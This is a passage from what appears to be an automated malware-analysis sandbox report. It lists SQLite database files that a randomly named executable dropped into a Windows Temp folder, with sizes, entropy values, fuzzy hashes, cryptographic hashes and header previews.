                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\SvUXwcFpKs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TD1XRNGgs4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TISaQyY5P8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TOu0d6tfhE

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TgUnaCWISO

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TqsiyZ3I5l

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\TuyAS1SQ3b

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\U4KilFO5yX

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\U9Jjg0isxL

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\UCcRFIREDo

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\UCqIL95Y34

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Uc8NIDdYyu

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Ud0MWm8myF

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\UnmjMq5zZ8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Uvzz61y7ox

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\V1E1Gy8R60

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\VW1FD0Sez8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Vsm3H3M6SZ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\VyMI7Gycg2

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\W0mwcyohHq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\W5382qC5H2

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\WEOAVVpwQT

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\WO1EZaVcPv

